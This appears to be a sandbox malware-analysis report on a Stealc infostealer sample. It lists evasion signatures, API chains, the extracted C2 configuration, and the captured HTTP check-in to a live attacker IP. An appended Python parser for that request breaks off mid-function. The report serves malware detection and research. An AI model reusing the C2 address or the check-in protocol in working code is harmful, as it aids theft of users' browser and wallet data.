
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562673
MD5: 6487be67797f2ab4bcd902c3b34efe97
SHA1: 6b4a7190c65c8c54c39e66fabab190afd36cb5fb
SHA256: bab41e3e4289d1b7d5785304cc05ba4acbb42b51d5d18053305b6bd19a77474a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6487BE67797F2AB4BCD902C3B34EFE97)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara Overview

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3800 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3800 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma Overview

No Sigma rule has matched

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T21:27:12.585325+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49717 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: file.exe.3800.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C4C50: lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C60D0: lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006E40B0: CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D6960: lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006CEA30: lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D6B79: lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C9B20: CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C9B80: CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C7750: GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D18A0: lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D3910: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D1269: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D1250: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006DE210: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D4B29: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D4B10: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006DCBE0: wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D23A9: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006CDB80: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006CDB99: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006D2390: lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006DDD30: GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006DD530: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C16A0: lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C16B9: lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 39 43 33 42 36 37 41 44 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a | Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"CF9C3B67AD1C389561124------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"mars------HDAFIIDAKJDGDHIDAKJJ--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 connections listed)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C6C40: lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 39 43 33 42 36 37 41 44 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a | Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"CF9C3B67AD1C389561124------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"mars------HDAFIIDAKJDGDHIDAKJJ--
Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2222214050.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpE
Source: file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz
Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206d
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006C9770: memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop
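The check-in POST captured above carries exactly two form fields, hwid and build (the botnet name from the extracted configuration), and no User-Agent header, which is what the "HTTP GET or POST without a user agent" signature keys on. The following Python is an added example, not Joe Sandbox or Stealc code: it reconstructs the request from the report's header list and Data Raw dump (the 210-byte body matches the declared Content-Length), parses the multipart body into fields, and applies a heuristic derived from this one capture. The heuristic is not the logic of Suricata SID 2044243, whose rule body is not on this page.

```python
"""
Parse the Stealc C2 check-in captured in the report and pull the form fields
out of the multipart body. Added example, not Joe Sandbox or Stealc code: the
request bytes below are reconstructed from the report's header list and
"Data Raw" dump (210-byte body, matching Content-Length).
"""
import re
from typing import Dict, Optional, Tuple

BOUNDARY = b"----HDAFIIDAKJDGDHIDAKJJ"

# Reconstructed request: headers as listed in the report, body as dumped.
CHECKIN_REQUEST = b"".join([
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n",
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n",
    b"Host: 185.215.113.206\r\n",
    b"Content-Length: 210\r\n",
    b"Connection: Keep-Alive\r\n",
    b"Cache-Control: no-cache\r\n",
    b"\r\n",
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n',
    b"CF9C3B67AD1C389561124\r\n",
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="build"\r\n\r\n',
    b"mars\r\n",
    b"--" + BOUNDARY + b"--\r\n",
])


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        raise ValueError(f"Content-Length {declared} != body length {len(body)}")
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: returns {field name: raw content}."""
    delimiter = b"--" + boundary
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        part_headers, _, content = part.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):       # CRLF that precedes the next delimiter
            content = content[:-2]
        match = re.search(rb'name="([^"]*)"', part_headers)
        if match:
            fields[match.group(1).decode("latin-1")] = content
    return fields


def extract_checkin(raw: bytes) -> Dict[str, Optional[str]]:
    """Request metadata plus decoded form fields, as one flat dict."""
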